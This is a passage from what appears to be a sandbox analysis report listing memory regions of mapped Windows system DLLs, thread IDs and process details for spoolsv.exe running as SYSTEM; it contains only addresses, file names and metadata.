(normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4552 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4553 start_va = 0x7ffaf0910000 end_va = 0x7ffaf0919fff entry_point = 0x7ffaf0910000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 4554 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4555 start_va = 0x7ffaf0990000 end_va = 0x7ffaf09d8fff entry_point = 0x7ffaf0990000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 4556 start_va = 0x7ffaf0a90000 end_va = 0x7ffaf0aabfff entry_point = 0x7ffaf0a90000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4557 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4558 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4559 start_va = 0x7ffaf12a0000 end_va = 0x7ffaf12ccfff entry_point = 0x7ffaf12a0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 4560 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4561 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 4562 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4563 start_va = 0x7ffaf1640000 end_va = 0x7ffaf16fffff entry_point = 0x7ffaf1640000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4564 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4565 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4566 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4567 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4568 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4569 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4570 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4571 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4572 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4573 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4574 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4575 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4576 start_va = 0x7ffaf3ea0000 end_va = 0x7ffaf3ec0fff entry_point = 0x7ffaf3ea0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 4577 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4578 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4579 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4580 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4581 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4582 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4583 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4584 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4585 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4586 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4587 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4588 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4589 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4590 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4591 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4592 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4593 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4594 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4595 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4596 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4597 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4598 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4599 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4600 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4601 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4602 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 510 os_tid = 0xe64 Thread: id = 511 os_tid = 0xe60 Thread: id = 512 os_tid = 0x2e4 Thread: id = 513 os_tid = 0xb00 Thread: id = 514 os_tid = 0xec Thread: id = 515 os_tid = 0x928 Thread: id = 516 os_tid = 0x6e4 Thread: id = 517 os_tid = 0x69c Thread: id = 518 os_tid = 0x690 Thread: id = 519 os_tid = 0x684 Thread: id = 520 os_tid = 0x678 Thread: id = 521 os_tid = 0x650 Thread: id = 522 os_tid = 0x624 Thread: id = 523 os_tid = 0x488 Thread: id = 524 os_tid = 0x470 Thread: id = 525 os_tid = 0x45c Thread: id = 526 os_tid = 0x440 Thread: id = 527 os_tid = 0x434 Thread: id = 528 os_tid = 0x430 Thread: id = 529 os_tid = 0x3e4 Thread: id = 530 os_tid = 0x300 Thread: id = 531 os_tid = 0x29c Process: id = "49" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x6c94b000" os_pid = "0x140" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010cc5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3026 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3027 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3028 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3029 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3030 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3031 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3032 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3033 start_va = 0xc0000 end_va = 0x17dfff entry_point = 0xc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3034 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3035 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3036 start_va = 0x2c0000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 3037 start_va = 0x450000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3038 start_va = 0x5e0000 end_va = 0x69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 3039 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x6a0000 region_type = mapped_file name = "spoolsv.exe.mui" filename = "\\Windows\\System32\\en-US\\spoolsv.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\spoolsv.exe.mui") Region: id = 3040 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3041 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3042 start_va = 0x6d0000 end_va = 0x6d6fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3043 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3044 start_va = 0x6f0000 end_va = 0x6f6fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3045 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3046 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 3047 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 3048 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3049 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 3050 start_va = 0x860000 end_va = 0x873fff entry_point = 0x860000 region_type = mapped_file name = "localspl.dll.mui" filename = "\\Windows\\System32\\en-US\\localspl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\localspl.dll.mui") Region: id = 3051 start_va = 0x8c0000 end_va = 0x8c0fff entry_point = 0x8c0000 region_type = mapped_file name = "wsdmon.dll.mui" filename = "\\Windows\\System32\\en-US\\WSDMon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsdmon.dll.mui") Region: id = 3052 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3053 start_va = 0x8e0000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 3054 start_va = 0x8f0000 end_va = 0x8f0fff entry_point = 0x8f0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 3055 start_va = 0x900000 end_va = 0x906fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3056 start_va = 0x910000 end_va = 0x910fff entry_point = 0x910000 region_type = mapped_file name = "win32spl.dll.mui" filename = "\\Windows\\System32\\en-US\\win32spl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\win32spl.dll.mui") Region: id = 3057 start_va = 0x920000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 3058 start_va = 0x930000 end_va = 0xc66fff entry_point = 0x930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3059 start_va = 0xc70000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 3060 start_va = 0xd70000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3061 start_va = 0xdb0000 end_va = 0xdb0fff entry_point = 0xdb0000 region_type = mapped_file name = "inetpp.dll.mui" filename = "\\Windows\\System32\\en-US\\inetpp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inetpp.dll.mui") Region: id = 3062 start_va = 0xde0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 3063 start_va = 0xdf0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 3064 start_va = 0xef0000 end_va = 0xfcefff entry_point = 0xef0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3065 start_va = 0xfd0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3066 start_va = 0x10d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 3067 start_va = 0x12d0000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3068 start_va = 0x1350000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 3069 start_va = 0x1390000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 3070 start_va = 0x1410000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 3071 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3072 start_va = 0x7df5ffe40000 end_va = 0x7ff5ffe3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe40000" filename = "" Region: id = 3073 start_va = 0x7ff7fd9be000 end_va = 0x7ff7fd9bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9be000" filename = "" Region: id = 3074 start_va = 0x7ff7fd9c2000 end_va = 0x7ff7fd9c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9c2000" filename = "" Region: id = 3075 start_va = 0x7ff7fd9c4000 end_va = 0x7ff7fd9c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9c4000" filename = "" Region: id = 3076 start_va = 0x7ff7fd9c8000 end_va = 0x7ff7fd9c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9c8000" filename = "" Region: id = 3077 start_va = 0x7ff7fd9ca000 end_va = 0x7ff7fd9cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9ca000" filename = "" Region: id = 3078 start_va = 0x7ff7fd9ce000 end_va = 0x7ff7fd9cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd9ce000" filename = "" Region: id = 3079 start_va = 0x7ff7fd9d0000 end_va = 0x7ff7fdacffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd9d0000" filename = "" Region: id = 3080 start_va = 0x7ff7fdad0000 end_va = 0x7ff7fdaf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fdad0000" filename = "" Region: id = 3081 start_va = 0x7ff7fdaf5000 end_va = 0x7ff7fdaf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fdaf5000" filename = "" Region: id = 3082 start_va = 0x7ff7fdaf6000 end_va = 0x7ff7fdaf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fdaf6000" filename = "" Region: id = 3083 start_va = 0x7ff7fdafa000 end_va = 0x7ff7fdafbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fdafa000" filename = "" Region: id = 3084 start_va = 0x7ff7fdafc000 end_va = 0x7ff7fdafdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fdafc000" filename = "" Region: id = 3085 start_va = 0x7ff7fdafe000 end_va = 0x7ff7fdafffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fdafe000" filename = "" Region: id = 3086 start_va = 0x7ff7fe0d0000 end_va = 0x7ff7fe194fff entry_point = 0x7ff7fe0d0000 region_type = mapped_file name = "spoolsv.exe" filename = "\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe") Region: id = 3087 start_va = 0x7ffaded40000 end_va = 0x7ffaded6dfff entry_point = 0x7ffaded40000 region_type = mapped_file name = "inetpp.dll" filename = "\\Windows\\System32\\inetpp.dll" (normalized: "c:\\windows\\system32\\inetpp.dll") Region: id = 3088 start_va = 0x7ffaded70000 end_va = 0x7ffadee41fff entry_point = 0x7ffaded70000 region_type = mapped_file name = "win32spl.dll" filename = "\\Windows\\System32\\win32spl.dll" (normalized: "c:\\windows\\system32\\win32spl.dll") Region: id = 3089 start_va = 0x7ffadeef0000 end_va = 0x7ffadefc2fff entry_point = 0x7ffadeef0000 region_type = mapped_file name = "drvstore.dll" filename = "\\Windows\\System32\\drvstore.dll" (normalized: "c:\\windows\\system32\\drvstore.dll") Region: id = 3090 start_va = 0x7ffadefd0000 end_va = 0x7ffadefe2fff entry_point = 0x7ffadefd0000 region_type = mapped_file name = "fdpnp.dll" filename = "\\Windows\\System32\\fdPnp.dll" (normalized: "c:\\windows\\system32\\fdpnp.dll") Region: id = 3091 start_va = 0x7ffadeff0000 end_va = 0x7ffadf019fff entry_point = 0x7ffadeff0000 region_type = mapped_file name = "fundisc.dll" filename = "\\Windows\\System32\\fundisc.dll" (normalized: "c:\\windows\\system32\\fundisc.dll") Region: id = 3092 start_va = 0x7ffadf150000 end_va = 0x7ffadf2cafff entry_point = 0x7ffadf150000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 3093 start_va = 0x7ffadf2d0000 end_va = 0x7ffadf376fff entry_point = 0x7ffadf2d0000 region_type = mapped_file name = "wsdapi.dll" filename = "\\Windows\\System32\\WSDApi.dll" (normalized: "c:\\windows\\system32\\wsdapi.dll") Region: id = 3094 start_va = 0x7ffadf380000 end_va = 0x7ffadf413fff entry_point = 0x7ffadf380000 region_type = mapped_file name = "wsdmon.dll" filename = "\\Windows\\System32\\WSDMon.dll" (normalized: "c:\\windows\\system32\\wsdmon.dll") Region: id = 3095 start_va = 0x7ffadf470000 end_va = 0x7ffadf4befff entry_point = 0x7ffadf470000 region_type = mapped_file name = "usbmon.dll" filename = "\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll") Region: id = 3096 start_va = 0x7ffadf9f0000 end_va = 0x7ffadfb05fff entry_point = 0x7ffadf9f0000 region_type = mapped_file name = "localspl.dll" filename = "\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll") Region: id = 3097 start_va = 0x7ffadffb0000 end_va = 0x7ffadffe9fff entry_point = 0x7ffadffb0000 region_type = mapped_file name = "tcpmon.dll" filename = "\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll") Region: id = 3098 start_va = 0x7ffae1820000 end_va = 0x7ffae18a3fff entry_point = 0x7ffae1820000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3099 start_va = 0x7ffae5a00000 end_va = 0x7ffae5a13fff entry_point = 0x7ffae5a00000 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll") Region: id = 3100 start_va = 0x7ffaea5e0000 end_va = 0x7ffaea856fff entry_point = 0x7ffaea5e0000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3101 start_va = 0x7ffaea9d0000 end_va = 0x7ffaea9e1fff entry_point = 0x7ffaea9d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3102 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3103 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3104 start_va = 0x7ffaecb30000 end_va = 0x7ffaecb3ffff entry_point = 0x7ffaecb30000 region_type = mapped_file name = "winprint.dll" filename = "\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll" (normalized: "c:\\windows\\system32\\spool\\prtprocs\\x64\\winprint.dll") Region: id = 3105 start_va = 0x7ffaeceb0000 end_va = 0x7ffaecec0fff entry_point = 0x7ffaeceb0000 region_type = mapped_file name = "fxsmon.dll" filename = "\\Windows\\System32\\FXSMON.dll" (normalized: "c:\\windows\\system32\\fxsmon.dll") Region: id = 3106 start_va = 0x7ffaecf20000 end_va = 0x7ffaecf3bfff entry_point = 